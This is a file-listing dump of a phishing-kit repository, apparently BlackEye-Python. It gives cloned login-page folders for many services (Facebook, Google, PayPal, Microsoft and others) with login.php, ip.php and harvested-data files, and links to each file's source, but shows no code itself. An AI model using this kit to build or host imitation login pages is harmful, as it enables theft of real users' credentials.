├── LICENSE ├── README.md ├── main.py └── sites ├── adobe ├── index.php ├── ip.php ├── login.html └── login.php ├── badoo ├── index.php ├── ip.php ├── login.html └── login.php ├── create ├── index.php ├── ip.php └── login.php ├── cryptocurrency ├── index.php ├── ip.php ├── login.html └── login.php ├── devianart ├── index.php ├── ip.php ├── login.html └── login.php ├── dropbox ├── index.php ├── ip.php ├── login.html └── login.php ├── facebook ├── index.php ├── ip.php ├── login.html ├── login.php └── mobile.html ├── github ├── index.php ├── ip.php ├── login.html └── login.php ├── gitlab ├── index.php ├── ip.php ├── login.html └── login.php ├── google ├── index.php ├── ip.php ├── login.html └── login.php ├── instafollowers ├── index.php ├── ip.php ├── login.html ├── login.php └── login_files │ ├── analytics.js │ ├── bootstrap.js │ ├── css.css │ ├── font-awesome.css │ ├── jquery.js │ ├── jquery_002.js │ ├── jquery_003.js │ ├── jquery_004.js │ ├── jquery_005.js │ ├── jquery_006.js │ ├── js.js │ ├── logo2.png │ ├── otherscript.js │ ├── scripts.js │ ├── smoothscroll.js │ ├── styles.css │ └── theme-a.css ├── instagram ├── index.php ├── index_files │ ├── 001bc33056c1.jpg │ ├── 2d9d7248af43.jpg │ ├── 4b70f6fae447.png │ ├── 629d23a3c7b2.jpg │ ├── 96f2557117a2.js.download │ ├── 9e7638226e17.png │ ├── aafd8c6b005d.jpg │ ├── b67d172d5783.js.download │ ├── d1f0f06b39df.js.download │ ├── f06b908907d5.png │ ├── f55c258e826e.png │ ├── f5ae123ab1e2.jpg │ ├── f9e5c0ca0804.js.download │ ├── fb48443ec9d3.png │ ├── lY4eZXm_YWu.html │ └── sdk.js.download ├── ip.php ├── ip.txt ├── login.html └── login.php ├── linkedin ├── index.php ├── ip.php ├── login.html └── login.php ├── messenger ├── index.php ├── ip.php ├── login.html └── login.php ├── microsoft ├── index.php ├── index_files │ ├── ConvergedLoginPaginatedStrings.EN.js │ ├── ConvergedLoginPaginatedStrings.js │ ├── ConvergedLogin_PCore.js │ ├── Converged_v21033.css │ ├── Converged_v21033.css2 │ ├── ellipsis_grey.svg │ ├── ellipsis_white.svg │ ├── microsoft_logo.svg │ ├── prefetch.html │ └── prefetch_data │ │ ├── boot.css │ │ ├── boot.js │ │ ├── boot_002.js │ │ ├── boot_003.js │ │ ├── boot_004.js │ │ ├── sprite1.css │ │ └── sprite1.png ├── ip.php ├── login.html └── login.php ├── myspace ├── index.php ├── ip.php ├── login.html └── login.php ├── netflix ├── Netflix_files │ ├── FB-f-Logo__blue_57.png │ ├── none.css │ ├── none.js │ ├── none_002.js │ ├── sdk.js │ └── xaOI6zd9HW9.html ├── index.php ├── ip.php ├── login.html └── login.php ├── origin ├── SIGN IN_files │ ├── EA_Origin_Lockup_Black.png │ ├── analytics.js │ ├── api.js │ ├── css.css │ ├── iframe_api.js │ ├── jquery-1.js │ ├── jquery.js │ ├── jquery_002.js │ ├── jquery_003.js │ ├── jquery_004.js │ ├── originX-pc-common.css │ ├── originX-pc-login.css │ ├── otk.css │ ├── recaptcha__en.js │ ├── sha.js │ ├── utag.js │ ├── utag_002.js │ └── www-widgetapi.js ├── index.php ├── ip.php ├── login.html └── login.php ├── paypal ├── index.php ├── ip.php ├── ip.txt ├── login.html └── login.php ├── pinterest ├── index.php ├── ip.php ├── login.html ├── login.php └── login_files │ ├── 130492214192672 │ ├── cbgapi.loaded_0 │ ├── cbgapi.loaded_1 │ ├── cbgapi.loaded_2 │ ├── cbgapi.loaded_3 │ ├── clientplusone.js │ ├── common_desktop-cc5955b1658b3049a89a8e74824afa2e.css │ ├── entryChunk-www-42ec251dd63eb28f1a3e87da28288e59.css │ ├── entryChunk-www-unauth-a04e2ef9d883ee259f83.js │ ├── fbevents.js │ ├── gestalt-039ab764a920c98697f74f32bdf681a1.css │ ├── iframe.html │ ├── iframe_data │ └── 3723580519-idpiframe.js │ ├── login_button.html │ ├── login_button_data │ ├── Z4_JZrbn7cR.js │ └── aMltqKRlCHD.png │ ├── pjs-0-5d015373385578e0d2c4.js │ ├── pjs-22-c150d8ee52dea5f25e55.js │ ├── pjs-231-02ef0f57734d26cb9029.js │ ├── pjs-49-388b2e3857b09960543d.js │ ├── pjs-51-02ea5c5c9fb36b662bcf.js │ ├── pjs-locale-en_US-lite-3dcf38fa608036c641ca.js │ ├── postmessageRelay.html │ ├── postmessageRelay_data │ ├── 25936583-postmessagerelay.js │ ├── cbgapi.loaded_0 │ └── rpcshindig_random.js │ ├── sdk.js │ ├── sdk_002.js │ ├── sdk_003.js │ ├── signin.html │ ├── vendor-react-d20f99c48b5d58e4821c.js │ └── xaOI6zd9HW9.html ├── protonmail ├── index.php ├── index_files │ ├── app.js │ ├── appLazy.js │ ├── logo.png │ ├── openpgp.js │ ├── styles.css │ ├── vendor.js │ └── vendorLazy.js ├── ip.php ├── login.html └── login.php ├── shopify ├── index.php ├── ip.php ├── login.html └── login.php ├── shopping ├── index.php ├── ip.php ├── login.html └── login.php ├── snapchat ├── accounts │ └── static │ │ ├── images │ │ ├── favicon │ │ │ └── favicon.png │ │ └── ghost │ │ │ └── ghost.svg │ │ ├── scripts │ │ ├── dropdown.min.js │ │ ├── jquery.min.js │ │ ├── main.js │ │ └── semantic.min.js │ │ └── styles │ │ ├── accounts.css │ │ ├── auth.css │ │ ├── dropdown.min.css │ │ ├── revoke.css │ │ ├── semantic.min.css │ │ ├── snapchat.css │ │ └── themes │ │ └── default │ │ └── assets │ │ ├── fonts │ │ ├── icons-.eot │ │ ├── icons.eot │ │ ├── icons.svg │ │ ├── icons.ttf │ │ ├── icons.woff │ │ └── icons.woff2 │ │ └── images │ │ └── flags.png.html ├── favicon.ico ├── ghost.svg ├── index.php ├── ip.php ├── login.html └── login.php ├── spotify ├── index.php ├── index_files │ ├── analytics.js │ ├── anchor.html │ ├── api.js │ ├── bframe.html │ ├── bframe_data │ │ ├── hVpKLs9k787xwHAhrfSZCIqM1XtnPD1dxAE7zC2jvTU.js │ │ └── styles__ltr.css │ ├── index.css │ ├── index.js │ └── recaptcha__en.js ├── ip.php ├── login.html └── login.php ├── steam ├── index.php ├── ip.php ├── login.html └── login.php ├── twitch ├── index.php ├── ip.php ├── login.html └── login.php ├── twitter ├── index.php ├── ip.php ├── ip.txt ├── login.html ├── login.php └── usernames.txt ├── verizon ├── index.php ├── ip.php ├── login.html └── login.php ├── vk ├── index.php ├── ip.php ├── login.html └── login.php ├── wordpress ├── index.php ├── index_files │ ├── images │ │ └── wordpress-logo.svg │ └── load-styles.css ├── ip.php ├── login.html └── login.php ├── yahoo ├── index.php ├── ip.php ├── login.html ├── login.php └── yahoo_files │ ├── boot.js │ ├── client.php │ ├── g-r-min.js │ ├── r-csc.html │ └── yahoo_en-US_f_p_bestfit_2x.png └── yandex ├── index.php ├── ip.php ├── login.html └── login.php /LICENSE: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/LICENSE -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/README.md -------------------------------------------------------------------------------- /main.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/main.py -------------------------------------------------------------------------------- /sites/adobe/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/adobe/ip.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/adobe/ip.php -------------------------------------------------------------------------------- /sites/adobe/login.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/adobe/login.html -------------------------------------------------------------------------------- /sites/adobe/login.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/adobe/login.php -------------------------------------------------------------------------------- /sites/badoo/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/badoo/ip.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/badoo/ip.php -------------------------------------------------------------------------------- /sites/badoo/login.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/badoo/login.html -------------------------------------------------------------------------------- /sites/badoo/login.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/badoo/login.php -------------------------------------------------------------------------------- /sites/create/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/create/ip.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/create/ip.php -------------------------------------------------------------------------------- /sites/create/login.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/create/login.php -------------------------------------------------------------------------------- /sites/cryptocurrency/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/cryptocurrency/ip.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/cryptocurrency/ip.php -------------------------------------------------------------------------------- /sites/cryptocurrency/login.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/cryptocurrency/login.html -------------------------------------------------------------------------------- /sites/cryptocurrency/login.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/cryptocurrency/login.php -------------------------------------------------------------------------------- /sites/devianart/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/devianart/ip.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/devianart/ip.php -------------------------------------------------------------------------------- /sites/devianart/login.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/devianart/login.html -------------------------------------------------------------------------------- /sites/devianart/login.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/devianart/login.php -------------------------------------------------------------------------------- /sites/dropbox/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/dropbox/ip.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/dropbox/ip.php -------------------------------------------------------------------------------- /sites/dropbox/login.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/dropbox/login.html -------------------------------------------------------------------------------- /sites/dropbox/login.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/dropbox/login.php -------------------------------------------------------------------------------- /sites/facebook/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/facebook/ip.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/facebook/ip.php -------------------------------------------------------------------------------- /sites/facebook/login.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/facebook/login.html -------------------------------------------------------------------------------- /sites/facebook/login.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/facebook/login.php -------------------------------------------------------------------------------- /sites/facebook/mobile.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/facebook/mobile.html -------------------------------------------------------------------------------- /sites/github/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/github/ip.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/github/ip.php -------------------------------------------------------------------------------- /sites/github/login.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/github/login.html -------------------------------------------------------------------------------- /sites/github/login.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/github/login.php -------------------------------------------------------------------------------- /sites/gitlab/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/gitlab/ip.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/gitlab/ip.php -------------------------------------------------------------------------------- /sites/gitlab/login.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/gitlab/login.html -------------------------------------------------------------------------------- /sites/gitlab/login.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/gitlab/login.php -------------------------------------------------------------------------------- /sites/google/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/google/ip.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/google/ip.php -------------------------------------------------------------------------------- /sites/google/login.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/google/login.html -------------------------------------------------------------------------------- /sites/google/login.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/google/login.php -------------------------------------------------------------------------------- /sites/instafollowers/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/instafollowers/ip.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/instafollowers/ip.php -------------------------------------------------------------------------------- /sites/instafollowers/login.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/instafollowers/login.html -------------------------------------------------------------------------------- /sites/instafollowers/login.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/instafollowers/login.php -------------------------------------------------------------------------------- /sites/instafollowers/login_files/analytics.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/instafollowers/login_files/analytics.js -------------------------------------------------------------------------------- /sites/instafollowers/login_files/bootstrap.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/instafollowers/login_files/bootstrap.js -------------------------------------------------------------------------------- /sites/instafollowers/login_files/css.css: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/instafollowers/login_files/css.css -------------------------------------------------------------------------------- /sites/instafollowers/login_files/font-awesome.css: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/instafollowers/login_files/font-awesome.css -------------------------------------------------------------------------------- /sites/instafollowers/login_files/jquery.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/instafollowers/login_files/jquery.js -------------------------------------------------------------------------------- /sites/instafollowers/login_files/jquery_002.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/instafollowers/login_files/jquery_002.js -------------------------------------------------------------------------------- /sites/instafollowers/login_files/jquery_003.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/instafollowers/login_files/jquery_003.js -------------------------------------------------------------------------------- /sites/instafollowers/login_files/jquery_004.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/instafollowers/login_files/jquery_004.js -------------------------------------------------------------------------------- /sites/instafollowers/login_files/jquery_005.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/instafollowers/login_files/jquery_005.js -------------------------------------------------------------------------------- /sites/instafollowers/login_files/jquery_006.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/instafollowers/login_files/jquery_006.js -------------------------------------------------------------------------------- /sites/instafollowers/login_files/js.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/instafollowers/login_files/js.js -------------------------------------------------------------------------------- /sites/instafollowers/login_files/logo2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/instafollowers/login_files/logo2.png -------------------------------------------------------------------------------- /sites/instafollowers/login_files/otherscript.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/instafollowers/login_files/otherscript.js -------------------------------------------------------------------------------- /sites/instafollowers/login_files/scripts.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/instafollowers/login_files/scripts.js -------------------------------------------------------------------------------- /sites/instafollowers/login_files/smoothscroll.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/instafollowers/login_files/smoothscroll.js -------------------------------------------------------------------------------- /sites/instafollowers/login_files/styles.css: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/instafollowers/login_files/styles.css -------------------------------------------------------------------------------- /sites/instafollowers/login_files/theme-a.css: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/instafollowers/login_files/theme-a.css -------------------------------------------------------------------------------- /sites/instagram/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/instagram/index_files/001bc33056c1.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/instagram/index_files/001bc33056c1.jpg -------------------------------------------------------------------------------- /sites/instagram/index_files/2d9d7248af43.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/instagram/index_files/2d9d7248af43.jpg -------------------------------------------------------------------------------- /sites/instagram/index_files/4b70f6fae447.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/instagram/index_files/4b70f6fae447.png -------------------------------------------------------------------------------- /sites/instagram/index_files/629d23a3c7b2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/instagram/index_files/629d23a3c7b2.jpg -------------------------------------------------------------------------------- /sites/instagram/index_files/96f2557117a2.js.download: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/instagram/index_files/96f2557117a2.js.download -------------------------------------------------------------------------------- /sites/instagram/index_files/9e7638226e17.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/instagram/index_files/9e7638226e17.png -------------------------------------------------------------------------------- /sites/instagram/index_files/aafd8c6b005d.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/instagram/index_files/aafd8c6b005d.jpg -------------------------------------------------------------------------------- /sites/instagram/index_files/b67d172d5783.js.download: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/instagram/index_files/b67d172d5783.js.download -------------------------------------------------------------------------------- /sites/instagram/index_files/d1f0f06b39df.js.download: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/instagram/index_files/d1f0f06b39df.js.download -------------------------------------------------------------------------------- /sites/instagram/index_files/f06b908907d5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/instagram/index_files/f06b908907d5.png -------------------------------------------------------------------------------- /sites/instagram/index_files/f55c258e826e.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/instagram/index_files/f55c258e826e.png -------------------------------------------------------------------------------- /sites/instagram/index_files/f5ae123ab1e2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/instagram/index_files/f5ae123ab1e2.jpg -------------------------------------------------------------------------------- /sites/instagram/index_files/f9e5c0ca0804.js.download: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/instagram/index_files/f9e5c0ca0804.js.download -------------------------------------------------------------------------------- /sites/instagram/index_files/fb48443ec9d3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/instagram/index_files/fb48443ec9d3.png -------------------------------------------------------------------------------- /sites/instagram/index_files/lY4eZXm_YWu.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/instagram/index_files/lY4eZXm_YWu.html -------------------------------------------------------------------------------- /sites/instagram/index_files/sdk.js.download: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/instagram/index_files/sdk.js.download -------------------------------------------------------------------------------- /sites/instagram/ip.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/instagram/ip.php -------------------------------------------------------------------------------- /sites/instagram/ip.txt: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /sites/instagram/login.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/instagram/login.html -------------------------------------------------------------------------------- /sites/instagram/login.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/instagram/login.php -------------------------------------------------------------------------------- /sites/linkedin/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/linkedin/ip.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/linkedin/ip.php -------------------------------------------------------------------------------- /sites/linkedin/login.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/linkedin/login.html -------------------------------------------------------------------------------- /sites/linkedin/login.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/linkedin/login.php -------------------------------------------------------------------------------- /sites/messenger/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/messenger/ip.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/messenger/ip.php -------------------------------------------------------------------------------- /sites/messenger/login.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/messenger/login.html -------------------------------------------------------------------------------- /sites/messenger/login.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/messenger/login.php -------------------------------------------------------------------------------- /sites/microsoft/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/microsoft/index_files/ConvergedLoginPaginatedStrings.EN.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/microsoft/index_files/ConvergedLoginPaginatedStrings.EN.js -------------------------------------------------------------------------------- /sites/microsoft/index_files/ConvergedLoginPaginatedStrings.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/microsoft/index_files/ConvergedLoginPaginatedStrings.js -------------------------------------------------------------------------------- /sites/microsoft/index_files/ConvergedLogin_PCore.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/microsoft/index_files/ConvergedLogin_PCore.js -------------------------------------------------------------------------------- /sites/microsoft/index_files/Converged_v21033.css: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/microsoft/index_files/Converged_v21033.css -------------------------------------------------------------------------------- /sites/microsoft/index_files/Converged_v21033.css2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/microsoft/index_files/Converged_v21033.css2 -------------------------------------------------------------------------------- /sites/microsoft/index_files/ellipsis_grey.svg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/microsoft/index_files/ellipsis_grey.svg -------------------------------------------------------------------------------- /sites/microsoft/index_files/ellipsis_white.svg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/microsoft/index_files/ellipsis_white.svg -------------------------------------------------------------------------------- /sites/microsoft/index_files/microsoft_logo.svg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/microsoft/index_files/microsoft_logo.svg -------------------------------------------------------------------------------- /sites/microsoft/index_files/prefetch.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/microsoft/index_files/prefetch.html -------------------------------------------------------------------------------- /sites/microsoft/index_files/prefetch_data/boot.css: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/microsoft/index_files/prefetch_data/boot.css -------------------------------------------------------------------------------- /sites/microsoft/index_files/prefetch_data/boot.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/microsoft/index_files/prefetch_data/boot.js -------------------------------------------------------------------------------- /sites/microsoft/index_files/prefetch_data/boot_002.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/microsoft/index_files/prefetch_data/boot_002.js -------------------------------------------------------------------------------- /sites/microsoft/index_files/prefetch_data/boot_003.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/microsoft/index_files/prefetch_data/boot_003.js -------------------------------------------------------------------------------- /sites/microsoft/index_files/prefetch_data/boot_004.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/microsoft/index_files/prefetch_data/boot_004.js -------------------------------------------------------------------------------- /sites/microsoft/index_files/prefetch_data/sprite1.css: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/microsoft/index_files/prefetch_data/sprite1.css -------------------------------------------------------------------------------- /sites/microsoft/index_files/prefetch_data/sprite1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/microsoft/index_files/prefetch_data/sprite1.png -------------------------------------------------------------------------------- /sites/microsoft/ip.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/microsoft/ip.php -------------------------------------------------------------------------------- /sites/microsoft/login.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/microsoft/login.html -------------------------------------------------------------------------------- /sites/microsoft/login.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/microsoft/login.php -------------------------------------------------------------------------------- /sites/myspace/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/myspace/ip.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/myspace/ip.php -------------------------------------------------------------------------------- /sites/myspace/login.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/myspace/login.html -------------------------------------------------------------------------------- /sites/myspace/login.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/myspace/login.php -------------------------------------------------------------------------------- /sites/netflix/Netflix_files/FB-f-Logo__blue_57.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/netflix/Netflix_files/FB-f-Logo__blue_57.png -------------------------------------------------------------------------------- /sites/netflix/Netflix_files/none.css: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/netflix/Netflix_files/none.css -------------------------------------------------------------------------------- /sites/netflix/Netflix_files/none.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/netflix/Netflix_files/none.js -------------------------------------------------------------------------------- /sites/netflix/Netflix_files/none_002.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/netflix/Netflix_files/none_002.js -------------------------------------------------------------------------------- /sites/netflix/Netflix_files/sdk.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/netflix/Netflix_files/sdk.js -------------------------------------------------------------------------------- /sites/netflix/Netflix_files/xaOI6zd9HW9.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/netflix/Netflix_files/xaOI6zd9HW9.html -------------------------------------------------------------------------------- /sites/netflix/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/netflix/ip.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/netflix/ip.php -------------------------------------------------------------------------------- /sites/netflix/login.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/netflix/login.html -------------------------------------------------------------------------------- /sites/netflix/login.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/netflix/login.php -------------------------------------------------------------------------------- /sites/origin/SIGN IN_files/EA_Origin_Lockup_Black.png: -------------------------------------------------------------------------------- 